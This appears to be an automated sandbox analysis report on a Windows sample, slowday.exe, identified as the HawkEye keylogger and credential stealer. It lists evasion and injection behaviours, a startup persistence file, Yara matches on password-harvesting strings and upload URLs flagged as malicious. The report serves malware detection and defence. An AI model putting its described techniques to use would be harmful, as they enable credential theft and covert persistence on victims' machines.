Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
slowday.exe

Overview

General Information

Sample Name:slowday.exe
Analysis ID:614362
MD5:a172f4b0fa1a44cb60901944cff7f8ed
SHA1:c4aa87ba839c2da6ed852ba0e936ac80d47ec5b5
SHA256:94243b53eceb2662ae632d9c3e02b5b947ea56ac4ac1db3a69fc0ca3e5100816
Tags:exehawkeyekeyloggerstealer
Infos:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MailPassView
Yara detected HawkEye Keylogger
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Detected HawkEye Rat
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Binary is likely a compiled AutoIt script file
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Writes to foreign memory regions
.NET source code references suspicious native API functions
Yara detected WebBrowserPassView password recovery tool
AutoIt script contains suspicious strings
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Creates a start menu entry (Start Menu\Programs\Startup)
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains capabilities to detect virtual machines
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • slowday.exe (PID: 6820 cmdline: "C:\Users\user\Desktop\slowday.exe" MD5: A172F4B0FA1A44CB60901944CFF7F8ED)
    • RegAsm.exe (PID: 6872 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
      • vbc.exe (PID: 6984 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpF1A4.tmp MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 6244 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp33E2.tmp MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 3356 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8255.tmp MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 2988 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8271.tmp MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • winlogons.exe (PID: 6236 cmdline: "C:\Users\user\AppData\Roaming\winlogons\winlogons.exe" MD5: 1C7E2FF84A8DA304070EC91B0FFC3051)
    • RegAsm.exe (PID: 3736 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
      • vbc.exe (PID: 4724 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp36CB.tmp MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 7084 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp7E2A.tmp MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 5852 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpC5B7.tmp MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 408 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp43C.tmp MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 3004 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp4F4.tmp MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.urlURL_File_Local_EXEDetects an .url file that points to a local executableFlorian Roth
  • 0x0:$s1: [InternetShortcut]
  • 0x13:$s2: URL=file:///C:\Users\user\AppData\Roaming\winlogons\winlogons.exe
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.urlMethodology_Suspicious_Shortcut_Local_URLDetects local script usage for .URL persistence@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x13:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmpAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    00000002.00000000.250900010.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
      00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmpMAL_HawkEye_Keylogger_Gen_Dec18Detects HawkEye Keylogger RebornFlorian Roth
      • 0x8f460:$s1: HawkEye Keylogger
      • 0x8e558:$s2: _ScreenshotLogger
      • 0x8eaa4:$s2: _ScreenshotLogger
      • 0x8e525:$s3: _PasswordStealer
      • 0x8ea71:$s3: _PasswordStealer
      00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
        Click to see the 120 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        35.0.vbc.exe.400000.4.raw.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
        • 0x147b0:$a1: logins.json
        • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
        • 0x14f34:$s4: \mozsqlite3.dll
        • 0x137a4:$s5: SMTP Password
        35.0.vbc.exe.400000.4.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          35.0.vbc.exe.400000.2.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
          • 0x131b0:$a1: logins.json
          • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
          • 0x13934:$s4: \mozsqlite3.dll
          • 0x121a4:$s5: SMTP Password
          35.0.vbc.exe.400000.2.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
            35.0.vbc.exe.400000.0.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
            • 0x131b0:$a1: logins.json
            • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
            • 0x13934:$s4: \mozsqlite3.dll
            • 0x121a4:$s5: SMTP Password
            Click to see the 246 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
            Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentCommandLine: "C:\Users\user\Desktop\slowday.exe" , ParentImage: C:\Users\user\Desktop\slowday.exe, ParentProcessId: 6820, ParentProcessName: slowday.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 6872, ProcessName: RegAsm.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\slowday.exe, ProcessId: 6820, TargetFilename: C:\Users\user\AppData\Roaming\winlogons\winlogons.exe
            Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentCommandLine: "C:\Users\user\Desktop\slowday.exe" , ParentImage: C:\Users\user\Desktop\slowday.exe, ParentProcessId: 6820, ParentProcessName: slowday.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 6872, ProcessName: RegAsm.exe

            Data Obfuscation

            barindex
            Sigma detected: Drops script at startup location
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\slowday.exe, ProcessId: 6820, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://a.pomf.cat/Avira URL Cloud: Label: phishing
            Source: http://pomf.cat/upload.phpAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exeAvira: detection malicious, Label: DR/AutoIt.Gen8
            Multi AV Scanner detection for submitted file
            Source: slowday.exeVirustotal: Detection: 74%Perma Link
            Source: slowday.exeReversingLabs: Detection: 73%
            Antivirus / Scanner detection for submitted sample
            Source: slowday.exeAvira: detected
            Multi AV Scanner detection for domain / URL
            Source: http://pomf.cat/upload.phpVirustotal: Detection: 7%Perma Link
            Source: 0.2.slowday.exe.dc0000.0.unpackAvira: Label: DR/AutoIt.Gen8
            Source: 7.0.winlogons.exe.1280000.0.unpackAvira: Label: DR/AutoIt.Gen8
            Source: 7.2.winlogons.exe.1280000.0.unpackAvira: Label: DR/AutoIt.Gen8
            Source: 1.0.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 1.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 7.3.winlogons.exe.3790000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 8.0.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 8.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 0.3.slowday.exe.3b50000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 8.0.RegAsm.exe.400000.1.unpackAvira: Label: TR/Dropper.Gen
            Source: 0.0.slowday.exe.dc0000.0.unpackAvira: Label: DR/AutoIt.Gen8
            Source: 1.0.RegAsm.exe.400000.1.unpackAvira: Label: TR/Dropper.Gen
            Source: slowday.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507015977.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507883137.0000000002D53000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507560729.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: RegAsm.exe, 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.508932595.0000000003234000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509181368.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WCN\en-US\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00E2449B GetFileAttributesW,FindFirstFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,
            Source: RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bot.whatismyipaddress.com/
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
            Source: bhvAE74.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
